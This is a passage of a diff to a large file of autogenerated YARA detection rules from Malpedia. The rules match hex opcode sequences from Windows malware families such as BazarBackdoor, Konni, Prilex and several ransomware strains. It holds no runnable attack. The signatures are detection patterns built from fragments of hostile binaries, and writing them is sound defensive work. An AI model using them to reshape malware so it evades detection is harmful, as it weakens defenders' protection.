89f1 57 53 e8???????? } - $sequence_1 = { 8d55b0 e8???????? eb25 c745b000000000 8d4dd0 8d55b0 e8???????? } - $sequence_2 = { c1e204 88443110 89f8 f7d0 c1e004 f30f7e0403 f30f7e4c0308 } - $sequence_3 = { c1c71a 31fa 8b7b04 89c3 339d70ffffff 0fcf 21cb } - $sequence_4 = { e9???????? 8d543210 8b7508 f20f104a30 f20f114e40 f20f104a28 f20f114e38 } - $sequence_5 = { f20f1101 8b55f0 8d4da8 ff7518 ff7514 ff7510 ff750c } - $sequence_6 = { f20f1145c8 0f82de010000 80ff0a 894804 0f85c9000000 8b7d0c 8b55ec } - $sequence_7 = { f20f114c2438 f20f108c2488000000 f20f11542430 f20f105028 f20f11442440 f20f115c2418 f20f1018 } - $sequence_8 = { e8???????? e9???????? ffb424fc000000 e8???????? e9???????? e8???????? 89c3 } - $sequence_9 = { ffd1 83c404 8b8c24a0190000 83790400 741f 8b84249c190000 83790809 } + $sequence_0 = { 8b48fc 03f7 8b78f8 8bd1 03fb c1e902 } + $sequence_1 = { 33ed 8d0c18 8bc3 99 } + $sequence_2 = { e8???????? 85c0 59 743e 8305????????20 8d0c9da0720610 } + $sequence_3 = { 8bc6 8b0c8da0720610 8d04c0 80648104fd 8d448104 8bc7 5f } + $sequence_4 = { 8d4c2418 50 51 e8???????? 83c40c 84c0 7439 } + $sequence_5 = { c1e705 f6441f0e01 7428 8b4c2474 81e2ffff2f00 895008 8b542440 } + $sequence_6 = { 51 eb07 8b16 8d441a02 } + $sequence_7 = { 85c0 7505 b8???????? 8078fffe 732f } + $sequence_8 = { 83c418 894c2424 b940000000 f3ab 66ab aa b940000000 } + $sequence_9 = { 3bd0 0f8c93fdffff 33ed 5b 8b74243c 8a4c241c } condition: - 7 of them and filesize <3340288 + 7 of them and filesize <893708 } -rule MALPEDIA_Win_Smarteyes_Auto : FILE +rule MALPEDIA_Win_Stresspaint_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "60f92ddb-7402-5d47-97fc-69a2fdffb7f3" + id = "1abc90df-5501-5268-be5d-9ffd5264cf78" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smarteyes_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stresspaint_auto.yar#L1-L151" license_url = "N/A" - logic_hash = "8c2da2c0cae87308c8e6e0dfb55ae530bef3c36e3693a233b1d96edfb1425c3c" + logic_hash = "34d2cc78b8a1b3b96faf71dac1e0e5a144bca4946a3f4a475da9ab8b6bdc6c9b" score = 75 quality = 75 tags = "FILE" @@ -177157,32 +179856,38 @@ rule MALPEDIA_Win_Smarteyes_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 8d85d4fdffff 50 e8???????? 8d85d4fdffff 889c35d4fdffff 83c40c } - $sequence_1 = { 68???????? e9???????? 53 68???????? e8???????? 33c0 40 } - $sequence_2 = { 3bc3 0f8426030000 8d842488040000 50 6804010000 ff15???????? 85c0 } - $sequence_3 = { 7478 83c00c 8bc8 8d7901 8a11 41 84d2 } - $sequence_4 = { 7413 8d85ecfeffff 57 50 } - $sequence_5 = { ff742424 ff742420 ff15???????? 85c0 7547 } - $sequence_6 = { e8???????? 59 59 8d8548f5ffff 50 8d9d78f7ffff e8???????? } - $sequence_7 = { 7514 8bf9 c744241001000000 e8???????? e9???????? 68???????? 8d442424 } - $sequence_8 = { 8d45ff 50 e8???????? 8a4736 8845ff 53 8d45ff } - $sequence_9 = { 8bd6 0fb7c0 6683f82f 7406 6683f85c 7502 8bca } + $sequence_0 = { 0103 014510 294514 83665800 } + $sequence_1 = { 8d540208 8908 8d4a04 8a5202 51 } + $sequence_2 = { 8d540203 3bea 7e4d 8b6c241c } + $sequence_3 = { 0106 83560400 837d1c00 7494 } + $sequence_4 = { 0103 ebaa 8b442408 56 } + $sequence_5 = { 0103 014510 294674 8b4674 } + $sequence_6 = { 0107 115f04 3bcb 7508 } + $sequence_7 = { 0108 8b8e44010000 114804 8b4f18 } + $sequence_8 = { 0107 83570400 85c9 7508 } + $sequence_9 = { 010b 8945fc 8bc2 83530400 } + $sequence_10 = { 8d5318 c7432400200000 66897312 c6431100 890a } + $sequence_11 = { 8d540201 52 51 6a39 55 } + $sequence_12 = { 8d540101 8bc5 89542430 8b542450 } + $sequence_13 = { 8d5338 3b02 740a 41 83c250 3bcf } + $sequence_14 = { 8d540201 8915???????? 33c0 8bd6 } + $sequence_15 = { 8d540208 8b4500 c70100000000 8b4c2430 } condition: - 7 of them and filesize <429056 + 7 of them and filesize <1155072 } -rule MALPEDIA_Win_Redcurl_Auto : FILE +rule MALPEDIA_Win_Zeoticus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "efe32a98-15fa-5dd0-a3ff-0a4fdcaec5ff" + id = "c2a18f25-bc43-5657-ba7f-277a7d143bb2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redcurl_auto.yar#L1-L190" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeoticus_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "550bb424cec4343fdcbf9ff6b82c03a2bb6c5d2f01439a45b43da803dcee1f93" + logic_hash = "a4d1e69467730f44a44fc31899a04b37f3c67c9d35561598e18a4009fa030896" score = 75 quality = 75 tags = "FILE" @@ -177196,44 +179901,34 @@ rule MALPEDIA_Win_Redcurl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745f000000000 ff15???????? 8bd0 c7461000000000 8bca c746140f000000 } - $sequence_1 = { 8bca c746140f000000 c60600 8d7901 } - $sequence_2 = { 99 b91a000000 f7f9 80c261 88143e 47 } - $sequence_3 = { 2bc6 48 50 56 } - $sequence_4 = { ba???????? 660fd645e0 e8???????? 83c404 } - $sequence_5 = { 48 3bc2 0f42d0 0fb6041a 03d3 } - $sequence_6 = { ff15???????? 6a00 85c0 744b } - $sequence_7 = { 50 e8???????? 8d0c3e 83c40c 3bf1 7410 0fb606 } - $sequence_8 = { 6a00 0f434d08 8bf0 6a00 } - $sequence_9 = { 0f57c0 c745dc00000000 68???????? ba???????? 660fd645d4 } - $sequence_10 = { c745f001000000 e8???????? c745e800000000 c745ec0f000000 c645d800 8d5001 } - $sequence_11 = { c745ec0f000000 c645d800 8d5001 8b4610 3bc2 726f } - $sequence_12 = { 0154241c 894104 e9???????? 8b44241c } - $sequence_13 = { 89542408 f7d0 0385e4fdffff 8995a4fbffff 8944240c } - $sequence_14 = { 00c1 83da03 2b54241c 0f8444230000 8b7c241c } - $sequence_15 = { 00c1 83db03 2b9d34fdffff 899d44fdffff } - $sequence_16 = { 00c2 83de03 2bb500ffffff 89b530ffffff } - $sequence_17 = { 00c1 83de03 29de 89b504feffff } - $sequence_18 = { 00c1 8d8510feffff 83da03 89442404 } - $sequence_19 = { 00c1 8b8300010000 83da03 29fa 7468 } + $sequence_0 = { b901000000 8b442404 0f44f1 85c0 7407 50 ff15???????? } + $sequence_1 = { 6a00 6a02 6a01 6a00 6a00 6a00 6890010000 } + $sequence_2 = { 53 68???????? 50 89048d00574300 ff15???????? a1???????? 83c410 } + $sequence_3 = { 8b0d???????? 8d442420 6a00 6a00 6a00 6a25 6800800000 } + $sequence_4 = { 8d4c2430 6a18 51 ffd0 a1???????? 83c408 85c0 } + $sequence_5 = { 42 88440e14 8b4c2424 41 894c2424 83fa0b } + $sequence_6 = { 56 57 8b7c2414 894c2418 390f 0f86df010000 } + $sequence_7 = { a3???????? c705????????00000000 c705????????00000000 c705????????00000000 e8???????? 8b4c2408 8b542404 } + $sequence_8 = { 56 57 894c2410 8b7810 8bf7 90 } + $sequence_9 = { 83c408 a3???????? ff742420 ffd0 85c0 754a } condition: - 7 of them and filesize <487424 + 7 of them and filesize <468992 } -rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE +rule MALPEDIA_Win_Telb_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d8c62ea3-2069-58e5-94bb-e4265ed7677c" + id = "41000399-e9f0-5453-bf9a-ecf53c98abcc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polyglot_ransom_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.telb_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "ecee7d25f676a4e4884cb2efcc0294d55515d4c6450d9ce1a59e043bd0d80704" + logic_hash = "96b99ffd86058bdff13d6d8551ee9f8fb32df4a8153fed924c3d3ed45dd1d6ae" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -177245,32 +179940,32 @@ rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff74244c e8???????? 8944241c 894c2448 6a07 895c2450 } - $sequence_1 = { 6a30 e8???????? 59 59 8d4d80 51 6801010000 } - $sequence_2 = { ff5004 83c328 ff4d10 75ad ff75f0 ff15???????? } - $sequence_3 = { be???????? 66f7c30040 6a04 5a 747a 6681fb0b40 756c } - $sequence_4 = { 50 68???????? e8???????? 8b85f0fdffff 59 59 8b08 } - $sequence_5 = { 627265 206f20 656c 696d696e617220 61 7263 6869766f73 } - $sequence_6 = { eb4f 8bf3 8bf9 a5 a5 a5 a5 } - $sequence_7 = { 59 59 751c 8b45fc 8b4020 85c0 } - $sequence_8 = { 5e c20400 68???????? 6a20 33c0 } - $sequence_9 = { 40 5e eb02 32c0 8b4d74 33cd } + $sequence_0 = { c744242400000000 e8???????? 68???????? ff15???????? a3???????? 8d4c2430 6a12 } + $sequence_1 = { 68???????? 8d8c24a4000000 e8???????? 8d8c24a0000000 e8???????? 8d8c24a0000000 } + $sequence_2 = { 668908 8d8d68eeffff c645fc26 e8???????? 8d8d68eeffff e8???????? 8d8dd0efffff } + $sequence_3 = { 8945fc 85f6 7407 83feff 746f eb69 8b1c9d485c4100 } + $sequence_4 = { 50 e8???????? 8b853ceeffff 83c40c 8985b0efffff 89b5b4efffff c645fc35 } + $sequence_5 = { 8d85f0bfffff 50 ff15???????? 85c0 0f847b020000 6800200000 } + $sequence_6 = { 0f8796150000 52 51 e8???????? 83c408 807c241200 } + $sequence_7 = { 8d442468 50 e8???????? 837c244408 8d4c2430 } + $sequence_8 = { 0f438570efffff 8d8d88efffff 50 e8???????? 6a01 68???????? 8d8d88efffff } + $sequence_9 = { 85f6 0f8551010000 a1???????? b9???????? 83c0f5 50 56 } condition: - 7 of them and filesize <1392640 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Odinaff_Auto : FILE +rule MALPEDIA_Win_Unidentified_076_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c28375cd-e1a8-5dbb-b117-119bc2a2a6cd" + id = "c76f9b8e-5a48-5b08-ae0b-831af19ce579" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.odinaff_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_076_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "de88658965024bda0c5434053043d1a37aa258e92b5fc7491f70abd6c372a45d" + logic_hash = "afb3d60b25322ebd0dc1ef4a0c20812c54fa6c9c843b7734da080ace48ec2894" score = 75 quality = 75 tags = "FILE" @@ -177284,32 +179979,32 @@ rule MALPEDIA_Win_Odinaff_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 3d1f040000 7505 bf01000000 } - $sequence_1 = { 740c 57 6a00 ffd3 50 ff15???????? 6a00 } - $sequence_2 = { 6a08 33ff 57 57 ff15???????? } - $sequence_3 = { 8bd8 ff15???????? 53 6a00 6a00 56 ff15???????? } - $sequence_4 = { 49 81c900ffffff 41 8a8138474000 } - $sequence_5 = { 8b1d???????? 83c40c 6820bf0200 56 ffd3 b900000800 2bc8 } - $sequence_6 = { c745dc01000000 e8???????? 6a44 8d4580 53 50 e8???????? } - $sequence_7 = { 7508 ff15???????? eb7b 6a04 } - $sequence_8 = { e8???????? 8b45f8 83c410 85c0 7408 50 6a00 } - $sequence_9 = { 8b4d0c 6a00 6880000000 6a02 } + $sequence_0 = { 488b5370 488d4520 488bcb 4889442420 e8???????? 8bc8 eb7c } + $sequence_1 = { 747b 8d5620 448bce 448bc5 33c9 ff97f8000000 48898748020000 } + $sequence_2 = { 488bcf ff9080000000 33d2 33c9 4c63c0 85c0 7e29 } + $sequence_3 = { 48894178 488b8f80000000 488b4618 48034f50 48898880000000 488b8f90000000 488b4618 } + $sequence_4 = { 458d6502 448bc7 488bce 4489642428 89442420 e8???????? 85c0 } + $sequence_5 = { 488d8d40150000 e8???????? 488d1587720000 488d8d14090000 8985d4000000 488d05c3130000 c7853001000000080000 } + $sequence_6 = { 4533c9 488bcf 448d420c 48895c2420 e8???????? eb05 bb01000000 } + $sequence_7 = { 7f0b 41b907000000 e9???????? 488b83c8000000 488b9360020000 488d8b5c060000 ff90f0070000 } + $sequence_8 = { 89442420 e8???????? eb56 83f801 7529 8b8714120000 448b8f10120000 } + $sequence_9 = { 415e 415c c3 817d0c08020000 7c05 458bcc eba2 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Ketrum_Auto : FILE +rule MALPEDIA_Win_Prilex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "675a5c68-35f7-5e7a-83cc-0627e32f2bf0" + id = "33d37f97-5d7f-5370-b6c1-4299d7c65706" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ketrum_auto.yar#L1-L174" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prilex_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "b179771de79024de54f910e3eea2ec187acafed93fd395a9caebde5421ab28f1" + logic_hash = "3845b326ac2cf1def622498895bf69526e3d4fb73889990b08fc4c5071c0498b" score = 75 quality = 75 tags = "FILE" @@ -177323,40 +180018,34 @@ rule MALPEDIA_Win_Ketrum_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e13f 5f 3bc8 7203 } - $sequence_1 = { 8d85fcebffff 50 8d85fcd3ffff 68???????? 50 ffd7 } - $sequence_2 = { ff15???????? ffb5f0cbffff ff15???????? ffb5e8cbffff ffb5f4cbffff } - $sequence_3 = { ab ab ab ab 68???????? 6a15 bf???????? } - $sequence_4 = { e8???????? 59 85db 7e15 57 8b7d08 2bfe } - $sequence_5 = { 33c0 0fb7f0 8bc6 c1e610 ba???????? } - $sequence_6 = { 7434 b9???????? 8bc1 8d7001 8a10 40 } - $sequence_7 = { 85c0 7404 33c0 eb5e 6880000000 56 } - $sequence_8 = { 397010 7699 837b1408 7204 8b13 eb02 } - $sequence_9 = { 8a4c181c 8888b0f74100 40 ebe9 33c0 8945e4 } - $sequence_10 = { 6a04 8d8520efffff 50 6a1f 57 } - $sequence_11 = { 8b8da4fdffff 2bc1 2bc6 50 03ce 51 } - $sequence_12 = { 3bf9 732c 8b16 3bd7 7726 8bc7 2bc2 } - $sequence_13 = { 8365fc00 83c074 50 8b4508 e8???????? } - $sequence_14 = { 89a570feffff 6a0f 5f 897e14 895e10 } - $sequence_15 = { 33ff 8d759c e8???????? 33c0 40 e8???????? } + $sequence_0 = { 8be8 ffd7 8d442410 8d4c2414 } + $sequence_1 = { 8b0f 51 ff15???????? 8945e4 68???????? } + $sequence_2 = { 8d442424 6a0c 8b11 50 52 56 } + $sequence_3 = { e8???????? 5d 8d4c2420 8d542414 51 } + $sequence_4 = { ff15???????? c745fc02000000 8b4510 33c9 833800 0f95c1 } + $sequence_5 = { 8d858cfdffff 52 8d8d9cfdffff 50 51 } + $sequence_6 = { 83c104 898d24ffffff c7851cffffff03400000 8d951cffffff 52 8d458c 50 } + $sequence_7 = { 8d8dacfdffff 68???????? 52 898d54fdffff c7854cfdffff08400000 } + $sequence_8 = { e8???????? 8bf0 ff15???????? 8d45ac } + $sequence_9 = { ffd6 50 8d4da0 68???????? 51 ffd6 } condition: - 7 of them and filesize <4599808 + 7 of them and filesize <450560 } -rule MALPEDIA_Win_Darkcloud_Auto : FILE +rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b0268fec-89c8-5323-9f85-c9d45089af7c" + id = "5d2ecc0c-54dd-5654-9202-132113260f24" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkcloud_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bazarbackdoor_auto.yar#L1-L638" license_url = "N/A" - logic_hash = "500bafad0751f0834ef38cd2423929e4bf071aa68fdd5512e97c403f17f02fd3" + logic_hash = "bfaa99dbae5ad02f0954740ed30f16e2a148a8070db46fd5f787ce6fb0204c77" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -177368,34 +180057,102 @@ rule MALPEDIA_Win_Darkcloud_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c414 8d4db0 ff15???????? c745fc23000000 8b4d08 894da8 } - $sequence_1 = { 894598 894db0 8945a8 894dc0 8945b8 ff15???????? 50 } - $sequence_2 = { 6a00 51 8bf0 ff15???????? 50 56 6a00 } - $sequence_3 = { 8d8d68ffffff 51 ff15???????? c745fc06000000 ba???????? 8d4dcc ff15???????? } - $sequence_4 = { 8d855cffffff 8d8df8feffff 50 8d954cffffff 51 52 c7851cffffff08000000 } - $sequence_5 = { 668b55dc 663b954cffffff 0f8ff4000000 c745fc0c000000 8d45dc 894584 c7857cffffff02400000 } - $sequence_6 = { ff15???????? 8bd0 8d8df0feffff ff15???????? 50 8b559c 52 } - $sequence_7 = { 668b00 8975dc 662d0100 8975cc 0f80e4000000 8975ac 894584 } - $sequence_8 = { 50 8d4d94 51 e8???????? 8bd0 8d4d84 ff15???????? } - $sequence_9 = { ff15???????? 8bd0 8d4da8 ff15???????? 8d5588 52 8d458c } + $sequence_0 = { 488bce 4889442420 ff15???????? 85c0 780a } + $sequence_1 = { 488bce ffd0 eb03 488bc3 } + $sequence_2 = { b803000000 e9???????? 488b5568 4c8d85f0040000 488b4c2450 bb08000000 } + $sequence_3 = { e9???????? 488b4c2458 488d55e0 ff15???????? } + $sequence_4 = { 4533c0 c744242002000000 ba00000040 ffd0 } + $sequence_5 = { 0fb70f ff15???????? 0fb74f02 0fb7d8 ff15???????? } + $sequence_6 = { 488d4d80 e8???????? 498bd6 488d4d80 } + $sequence_7 = { 7507 33c0 e9???????? b8ff000000 } + $sequence_8 = { 0fb7d8 ff15???????? 0fb74f08 440fb7e8 } + $sequence_9 = { 4885c9 7406 488b11 ff5210 ff15???????? } + $sequence_10 = { e8???????? cc e8???????? cc 4053 4883ec20 b902000000 } + $sequence_11 = { c3 0fb74c0818 b80b010000 663bc8 } + $sequence_12 = { e8???????? 4c89e1 e8???????? 8b05???????? } + $sequence_13 = { 4533c9 4889442428 488d95a0070000 488d442470 41b80f100000 } + $sequence_14 = { 0fb6c9 4881e9c0000000 48c1e108 4803c8 8bc1 488d94059f070000 } + $sequence_15 = { 31ff 4889c1 31d2 4989f0 } + $sequence_16 = { 4889f1 e8???????? 8b05???????? 8b0d???????? } + $sequence_17 = { 4c89742440 4c89742438 4489742430 4c89742428 } + $sequence_18 = { ff15???????? 4889c1 31d2 4d89e0 } + $sequence_19 = { 418d5508 488bc8 ff15???????? 488bd8 } + $sequence_20 = { e8???????? 4889c7 8b05???????? 8b0d???????? } + $sequence_21 = { 488d9590050000 488bce ff15???????? 85c0 } + $sequence_22 = { 488d442470 41b80f100000 488bce 4889442420 } + $sequence_23 = { ff15???????? ff15???????? 4d8bc5 33d2 488bc8 } + $sequence_24 = { 0fafc8 89c8 83f0fe 85c8 0f95c0 0f94c3 } + $sequence_25 = { c744242003000000 4889f9 ba00000080 41b801000000 } + $sequence_26 = { c744242800000001 4533c9 4533c0 c744242002000000 ba1f000f00 } + $sequence_27 = { 83fe09 0f9fc2 83fe0a 0f9cc1 } + $sequence_28 = { 4889442428 488d95b0030000 488d4580 41b80f100000 } + $sequence_29 = { 4d8bc7 33d2 488bc8 ff15???????? ff15???????? } + $sequence_30 = { 08ca 80f201 7502 ebfe } + $sequence_31 = { 48c744243000000000 c744242880000000 c744242003000000 4889f9 } + $sequence_32 = { 0f94c3 83f809 0f9fc2 83f80a 0f9cc0 30d8 } + $sequence_33 = { 0fb65305 33c0 80f973 0f94c0 } + $sequence_34 = { 0f9fc1 83fa0a 0f9cc2 30da 08c1 80f101 08d1 } + $sequence_35 = { 7528 0fb64b04 0fb6d1 80f973 } + $sequence_36 = { 4889c1 31d2 4989f8 ff15???????? 4885c0 } + $sequence_37 = { ff15???????? 31ed 4889c1 31d2 4989d8 } + $sequence_38 = { 488bd3 e8???????? ff15???????? 4c8bc3 33d2 } + $sequence_39 = { 0fb6d1 80f973 7504 0fb65305 } + $sequence_40 = { 08c1 80f101 7502 ebfe } + $sequence_41 = { e8???????? 4889f9 4889f2 ffd0 } + $sequence_42 = { 0f9cc2 30da 7509 08c1 } + $sequence_43 = { 85da 0f94c3 83fd0a 0f9cc2 } + $sequence_44 = { 84d2 7405 80fa2e 750f } + $sequence_45 = { 4889c1 31d2 4d89e8 ff15???????? } + $sequence_46 = { 4889c1 31d2 4d89f8 ffd3 } + $sequence_47 = { e8???????? 4c897c2420 4889d9 89fa } + $sequence_48 = { 89f0 4883c450 5b 5f } + $sequence_49 = { 8d4833 ff15???????? c744242810000000 4533c9 } + $sequence_50 = { 6a00 56 ff15???????? 5f 5e 5d 8bc3 } + $sequence_51 = { 689c7d9d93 6a04 5a e8???????? 59 59 85c0 } + $sequence_52 = { 8d44244c 50 6a00 ff74243c 53 55 ff15???????? } + $sequence_53 = { 6685ff 0f849c000000 837c2460ff 0f858c000000 } + $sequence_54 = { 50 0fb745e8 50 68???????? e8???????? } + $sequence_55 = { 66890d???????? 0fb7ca ff15???????? b901000000 66c746020100 668906 } + $sequence_56 = { 7506 8b0e 894c2460 0fb7c0 } + $sequence_57 = { 8a842483030000 81fe80000000 760b 24f2 0c02 } + $sequence_58 = { 57 8d4101 6a0e 8bf0 5f 8a11 } + $sequence_59 = { 7406 6a35 ffd0 eb02 33c0 } + $sequence_60 = { ffd6 8d7001 56 6a08 ff15???????? 50 } + $sequence_61 = { 740d 33d2 83f902 0f95c2 83c224 } + $sequence_62 = { 0f95c2 83c224 eb05 ba29000000 } + $sequence_63 = { 660f73d801 660febd0 660f7ed0 84c0 } + $sequence_64 = { 750b 8ac1 2ac2 fec8 88041a } + $sequence_65 = { 8d4701 84c9 0f45c7 803a00 8bf8 } + $sequence_66 = { 6a00 6a00 50 8d4601 } + $sequence_67 = { c1f808 0fb6c0 50 0fb6c2 } + $sequence_68 = { 83c410 b800308804 6a00 50 } + $sequence_69 = { 81feff030000 733c 8a02 3cc0 721e 0fb6c8 } + $sequence_70 = { 89542410 48894c2408 4883ec48 8b442458 89442424 48c744242800000000 } + $sequence_71 = { 488b442430 488b8c2410010000 48894830 488b442430 488b8c2418010000 48894838 488b442430 } + $sequence_72 = { 488bca 448bc0 488bd1 488b4c2430 e8???????? 488b442428 } + $sequence_73 = { ff15???????? 33c0 eb47 488b442430 8b4014 } + $sequence_74 = { 4825ffff0000 488b8c2488000000 4c8b4140 488bd0 } + $sequence_75 = { 488b442430 48c7404800000000 488b442430 eb14 } + $sequence_76 = { eb1f 488b442430 8b4024 2580000000 } + $sequence_77 = { 488b442458 488b00 b908000000 486bc909 488d840888000000 4889442428 488b442428 } condition: - 7 of them and filesize <622592 + 7 of them and filesize <2088960 } -rule MALPEDIA_Win_Banjori_Auto : FILE +rule MALPEDIA_Win_Konni_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0d7b2a6e-e2ca-5160-9081-9a7cfdf5e1be" + id = "7138d9e1-4213-5d32-a401-6f7ceedaf286" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.banjori_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.konni_auto.yar#L1-L461" license_url = "N/A" - logic_hash = "9dcfb5d77d585c9251303d49a0603c551cff0efcfccd66cc7c87519a0e64ecdd" + logic_hash = "81aa3927272d55dae2dfea8fc0fbd2614b2bb50237cc36185301dfe759c8d64e" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -177407,32 +180164,72 @@ rule MALPEDIA_Win_Banjori_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6800010000 e8???????? 8945f4 81f9000c0000 7308 e8???????? 8945f0 } - $sequence_1 = { 50 ff15???????? ffb5a0feffff e8???????? 53 53 53 } - $sequence_2 = { 68???????? ff75fc ff15???????? 53 ff75fc ff15???????? 68???????? } - $sequence_3 = { ff750c 53 53 53 53 ff7508 ff35???????? } - $sequence_4 = { 78e1 8945e8 eb18 8d85aafeffff 50 ff75e8 ff15???????? } - $sequence_5 = { 85c0 7539 68???????? e8???????? 85c0 752b } - $sequence_6 = { 6802000080 e8???????? 85c0 0f85fe000000 895df0 8d45f0 50 } - $sequence_7 = { 8945f4 8d45f8 50 6819000200 6a00 68???????? 6802000080 } - $sequence_8 = { 50 ff35???????? e8???????? e9???????? c745f864000000 68???????? ff15???????? } - $sequence_9 = { 6a10 8d45b4 50 ff75c4 ff15???????? 85c0 0f883a020000 } + $sequence_0 = { 7908 4e 81ce00ffffff 46 8a9c35f8feffff 8819 889435f8feffff } + $sequence_1 = { 8945fc 53 56 57 b910000000 be???????? 8d7db0 } + $sequence_2 = { 7527 0fb655eb 0fb645ea 52 } + $sequence_3 = { 889435f8feffff 0fb609 0fb6d2 03ca 81e1ff000080 7908 } + $sequence_4 = { 0fbef1 d0f9 83e601 884c15f4 8970e8 42 } + $sequence_5 = { 49 81c900ffffff 41 8a940df8feffff 8d8c0df8feffff 0fb6da 03f3 } + $sequence_6 = { 83e601 897004 d0f9 0fbef1 83e601 8930 } + $sequence_7 = { 68b6030000 6a0d 50 ff15???????? } + $sequence_8 = { 6a01 ff15???????? 50 a3???????? } + $sequence_9 = { 33c9 83f802 7508 890d???????? } + $sequence_10 = { eb1e 83f804 740f c705????????02000000 } + $sequence_11 = { 740f c705????????02000000 83f801 750a c705????????01000000 890d???????? } + $sequence_12 = { 7508 890d???????? eb1e 83f804 } + $sequence_13 = { 8916 56 e8???????? 8a8c30dec44600 } + $sequence_14 = { e8???????? 83c40c 6804010000 8d8df4fdffff 51 ff15???????? } + $sequence_15 = { 83e203 83f908 7229 f3a5 ff2495f0444000 8bc7 } + $sequence_16 = { 8d85f8feffff 50 ffd6 68???????? 8d8df0faffff } + $sequence_17 = { 4c89742420 ff15???????? 488bd8 4885c0 744f } + $sequence_18 = { bbedffffff 03dd 81eb00200200 83bd9404000000 899d94040000 0f85d7030000 } + $sequence_19 = { e9???????? 8b35???????? 68???????? 8d85f8feffff } + $sequence_20 = { ff95b50f0000 898598040000 8bf0 8d7d51 } + $sequence_21 = { 6804010000 8d95f8feffff 52 50 ff15???????? } + $sequence_22 = { 50 038594040000 59 0bc9 89851a040000 61 7508 } + $sequence_23 = { 8b4e08 33db 56 e8???????? 8a9c30c2c44600 } + $sequence_24 = { 8bf0 